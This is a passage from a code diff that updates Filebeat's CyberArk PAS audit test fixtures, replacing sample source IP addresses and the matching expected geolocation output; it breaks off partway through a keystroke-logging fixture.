@@ -1,7 +1,7 @@ -<5>1 2021-03-10T18:16:49Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:49","IsoTimestamp":"2021-03-10T18:16:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"PVWAAppUsers","TargetUser":"","Safe":"PSM","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} -<5>1 2021-03-10T18:16:50Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:50","IsoTimestamp":"2021-03-10T18:16:50Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"PSMApp_VAGRANT","TargetUser":"","Safe":"PVWAConfig","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} -<5>1 2021-03-10T18:16:51Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:51","IsoTimestamp":"2021-03-10T18:16:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"PSMAppUsers","TargetUser":"","Safe":"PSM","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} -<5>1 2021-03-10T18:16:51Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 
10:16:51","IsoTimestamp":"2021-03-10T18:16:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"PSMMaster","TargetUser":"","Safe":"PSM","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} -<5>1 2021-03-10T18:16:53Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:53","IsoTimestamp":"2021-03-10T18:16:53Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"Vault Admins","TargetUser":"","Safe":"PSMUniversalConnectors","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} -<5>1 2021-03-10T22:19:18Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:18","IsoTimestamp":"2021-03-10T22:19:18Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"PVWAAppUsers","TargetUser":"","Safe":"PSM","File":"","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} -<5>1 2021-03-11T17:38:14Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:14\n 2021-03-11T17:38:14Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 33\n Update Owner\n Info\n PSMPApp_VAGRANT\n Update Owner\n Auditors\n \n PSMRecordings\n \n 81.32.170.205\n \n \n \n \n \n Update Owner\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 
11 09:38:14","IsoTimestamp":"2021-03-11T17:38:14Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Update Owner","SourceUser":"Auditors","TargetUser":"","Safe":"PSMRecordings","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} +<5>1 2021-03-10T18:16:49Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:49","IsoTimestamp":"2021-03-10T18:16:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"PVWAAppUsers","TargetUser":"","Safe":"PSM","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} +<5>1 2021-03-10T18:16:50Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:50","IsoTimestamp":"2021-03-10T18:16:50Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"PSMApp_VAGRANT","TargetUser":"","Safe":"PVWAConfig","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} +<5>1 2021-03-10T18:16:51Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:51","IsoTimestamp":"2021-03-10T18:16:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update 
Owner","SourceUser":"PSMAppUsers","TargetUser":"","Safe":"PSM","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} +<5>1 2021-03-10T18:16:51Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:51","IsoTimestamp":"2021-03-10T18:16:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"PSMMaster","TargetUser":"","Safe":"PSM","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} +<5>1 2021-03-10T18:16:53Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:16:53","IsoTimestamp":"2021-03-10T18:16:53Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"Vault Admins","TargetUser":"","Safe":"PSMUniversalConnectors","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} +<5>1 2021-03-10T22:19:18Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:19:18","IsoTimestamp":"2021-03-10T22:19:18Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"Administrator","Action":"Update Owner","SourceUser":"PVWAAppUsers","TargetUser":"","Safe":"PSM","File":"","Station":"67.43.156.12","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} +<5>1 2021-03-11T17:38:14Z 
VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:14\n 2021-03-11T17:38:14Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 33\n Update Owner\n Info\n PSMPApp_VAGRANT\n Update Owner\n Auditors\n \n PSMRecordings\n \n 67.43.156.14\n \n \n \n \n \n Update Owner\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:14","IsoTimestamp":"2021-03-11T17:38:14Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"33","Desc":"Update Owner","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Update Owner","SourceUser":"Auditors","TargetUser":"","Safe":"PSMRecordings","File":"","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Update Owner","GatewayStation":""}}} diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/33_update_owner.log-expected.json b/x-pack/filebeat/module/cyberarkpas/audit/test/33_update_owner.log-expected.json index 6c272ceb7127..a7009d3e0cb6 100644 --- a/x-pack/filebeat/module/cyberarkpas/audit/test/33_update_owner.log-expected.json +++ b/x-pack/filebeat/module/cyberarkpas/audit/test/33_update_owner.log-expected.json @@ -10,7 +10,7 @@ "cyberarkpas.audit.safe": "PSM", "cyberarkpas.audit.severity": "Info", "cyberarkpas.audit.source_user": "PVWAAppUsers", - "cyberarkpas.audit.station": "81.32.170.205", + "cyberarkpas.audit.station": "67.43.156.14", "cyberarkpas.audit.timestamp": "Mar 10 10:16:49", "event.action": "update owner", "event.category": [ 
@@ -37,23 +37,20 @@
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "related.user": [
 "Administrator",
 "PVWAAppUsers"
 ],
 "service.type": "cyberarkpas",
- "source.address": "81.32.170.205",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "81.32.170.205",
+ "source.address": "67.43.156.14",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.14",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -72,7 +69,7 @@
 "cyberarkpas.audit.safe": "PVWAConfig",
 "cyberarkpas.audit.severity": "Info",
 "cyberarkpas.audit.source_user": "PSMApp_VAGRANT",
- "cyberarkpas.audit.station": "81.32.170.205",
+ "cyberarkpas.audit.station": "67.43.156.14",
 "cyberarkpas.audit.timestamp": "Mar 10 10:16:50",
 "event.action": "update owner",
 "event.category": [
@@ -92,30 +89,27 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 578,
+ "log.offset": 577,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "related.user": [
 "Administrator",
 "PSMApp_VAGRANT"
 ],
 "service.type": "cyberarkpas",
- "source.address": "81.32.170.205",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "81.32.170.205",
+ "source.address": "67.43.156.14",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.14",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -134,7 +128,7 @@
 "cyberarkpas.audit.safe": "PSM",
 "cyberarkpas.audit.severity": "Info",
 "cyberarkpas.audit.source_user": "PSMAppUsers",
- "cyberarkpas.audit.station": "81.32.170.205",
+ "cyberarkpas.audit.station": "67.43.156.14",
 "cyberarkpas.audit.timestamp": "Mar 10 10:16:51",
 "event.action": "update owner",
 "event.category": [
@@ -154,30 +148,27 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 1165,
+ "log.offset": 1163,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "related.user": [
 "Administrator",
 "PSMAppUsers"
 ],
 "service.type": "cyberarkpas",
- "source.address": "81.32.170.205",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "81.32.170.205",
+ "source.address": "67.43.156.14",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.14",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -196,7 +187,7 @@
 "cyberarkpas.audit.safe": "PSM",
 "cyberarkpas.audit.severity": "Info",
 "cyberarkpas.audit.source_user": "PSMMaster",
- "cyberarkpas.audit.station": "81.32.170.205",
+ "cyberarkpas.audit.station": "67.43.156.14",
 "cyberarkpas.audit.timestamp": "Mar 10 10:16:51",
 "event.action": "update owner",
 "event.category": [
@@ -216,30 +207,27 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 1742,
+ "log.offset": 1739,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "related.user": [
 "Administrator",
 "PSMMaster"
 ],
 "service.type": "cyberarkpas",
- "source.address": "81.32.170.205",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "81.32.170.205",
+ "source.address": "67.43.156.14",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.14",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -258,7 +246,7 @@
 "cyberarkpas.audit.safe": "PSMUniversalConnectors",
 "cyberarkpas.audit.severity": "Info",
 "cyberarkpas.audit.source_user": "Vault Admins",
- "cyberarkpas.audit.station": "81.32.170.205",
+ "cyberarkpas.audit.station": "67.43.156.14",
 "cyberarkpas.audit.timestamp": "Mar 10 10:16:53",
 "event.action": "update owner",
 "event.category": [
@@ -278,30 +266,27 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 2317,
+ "log.offset": 2313,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "related.user": [
 "Administrator",
 "Vault Admins"
 ],
 "service.type": "cyberarkpas",
- "source.address": "81.32.170.205",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "81.32.170.205",
+ "source.address": "67.43.156.14",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.14",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -320,7 +305,7 @@
 "cyberarkpas.audit.safe": "PSM",
 "cyberarkpas.audit.severity": "Info",
 "cyberarkpas.audit.source_user": "PVWAAppUsers",
- "cyberarkpas.audit.station": "35.192.121.42",
+ "cyberarkpas.audit.station": "67.43.156.12",
 "cyberarkpas.audit.timestamp": "Mar 10 14:19:18",
 "event.action": "update owner",
 "event.category": [
@@ -340,29 +325,27 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 2914,
+ "log.offset": 2909,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "35.192.121.42"
+ "67.43.156.12"
 ],
 "related.user": [
 "Administrator",
 "PVWAAppUsers"
 ],
 "service.type": "cyberarkpas",
- "source.address": "35.192.121.42",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 38.6583,
- "source.geo.location.lon": -77.2481,
- "source.geo.region_iso_code": "US-VA",
- "source.geo.region_name": "Virginia",
- "source.ip": "35.192.121.42",
+ "source.address": "67.43.156.12",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.12",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
@@ -377,12 +360,12 @@
 "cyberarkpas.audit.iso_timestamp": "2021-03-11T17:38:14Z",
 "cyberarkpas.audit.issuer": "PSMPApp_VAGRANT",
 "cyberarkpas.audit.message": "Update Owner",
- "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 09:38:14\n 2021-03-11T17:38:14Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 33\n Update Owner\n Info\n PSMPApp_VAGRANT\n Update Owner\n Auditors\n \n PSMRecordings\n \n 81.32.170.205\n \n \n \n \n \n Update Owner\n \n \n\n",
+ "cyberarkpas.audit.raw": "\n\n \n yes\n Mar 11 09:38:14\n 2021-03-11T17:38:14Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 33\n Update Owner\n Info\n PSMPApp_VAGRANT\n Update Owner\n Auditors\n \n PSMRecordings\n \n 67.43.156.14\n \n \n \n \n \n Update Owner\n \n \n\n",
 "cyberarkpas.audit.rfc5424": true,
 "cyberarkpas.audit.safe": "PSMRecordings",
 "cyberarkpas.audit.severity": "Info",
 "cyberarkpas.audit.source_user": "Auditors",
- "cyberarkpas.audit.station": "81.32.170.205",
+ "cyberarkpas.audit.station": "67.43.156.14",
 "cyberarkpas.audit.timestamp": "Mar 11 09:38:14",
 "event.action": "update owner",
 "event.category": [
@@ -402,30 +385,27 @@
 "fileset.name": "audit",
 "host.name": "VAULT",
 "input.type": "log",
- "log.offset": 3492,
+ "log.offset": 3486,
 "log.syslog.priority": "5",
 "observer.hostname": "VAULT",
 "observer.product": "Vault",
 "observer.vendor": "Cyber-Ark",
 "observer.version": "11.7.0000",
 "related.ip": [
- "81.32.170.205"
+ "67.43.156.14"
 ],
 "related.user": [
 "Auditors",
 "PSMPApp_VAGRANT"
 ],
 "service.type": "cyberarkpas",
- "source.address": "81.32.170.205",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "81.32.170.205",
+ "source.address": "67.43.156.14",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.14",
 "tags": [
 "cyberarkpas.audit",
 "forwarded"
diff --git a/x-pack/filebeat/module/cyberarkpas/audit/test/361_keystroke_logging.log b/x-pack/filebeat/module/cyberarkpas/audit/test/361_keystroke_logging.log
index 6c959f21d653..f03cca4fde99 100644
--- a/x-pack/filebeat/module/cyberarkpas/audit/test/361_keystroke_logging.log
+++ b/x-pack/filebeat/module/cyberarkpas/audit/test/361_keystroke_logging.log
@@ -1,7 +1,7 @@ {"format":"elastic","version":"1.0","raw":"\n \n no\n Cyber-Ark\n Vault\n 11.6.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n Linux\n Root\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2\n 10.2.0.7\n \n \n \n \n Command=ls \"/var/tmp\";ConnectionComponentId=PSMP-SSH;DstHost=radiussrv.cyberark.local;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=499852f2-22b5-11eb-8bff-000c297aae88;SrcHost=10.2.0.6;SSHOffset=3642B;User=admin2;VIDOffset=125T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n","syslog":{"audit_record":{"Rfc5424":"no","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.6.0000","MessageID":"361","IsoTimestamp":"2021-03-16T15:01:00Z","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"Linux","File":"Root\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2","Station":"10.2.0.7","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=ls \"/var/tmp\";ConnectionComponentId=PSMP-SSH;DstHost=radiussrv.cyberark.local;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=499852f2-22b5-11eb-8bff-000c297aae88;SrcHost=10.2.0.6;SSHOffset=3642B;User=admin2;VIDOffset=125T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"LINUX-SSH"},{"Name":"UserName","Value":"admin2"},{"Name":"Address","Value":"radiussrv.cyberark.local"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"CPMDisabled","Value":"No Reason"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"Customer","Value":"Tesla"}]}}}} -<5>1 2021-03-14T13:49:49Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:49\n 2021-03-14T13:49:49Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 
34.71.250.247\n \n \n \n \n Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=10T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:49","IsoTimestamp":"2021-03-14T13:49:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=10T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T10:32:04Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:32:04\n 2021-03-15T10:32:04Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=81.32.170.205;SSHOffset=1312B;User=testark;VIDOffset=6T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:32:04","IsoTimestamp":"2021-03-15T10:32:04Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=81.32.170.205;SSHOffset=1312B;User=testark;VIDOffset=6T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T10:33:47Z VAULT 
{"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:33:47\n 2021-03-15T10:33:47Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=7T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:33:47","IsoTimestamp":"2021-03-15T10:33:47Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=7T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T10:35:08Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 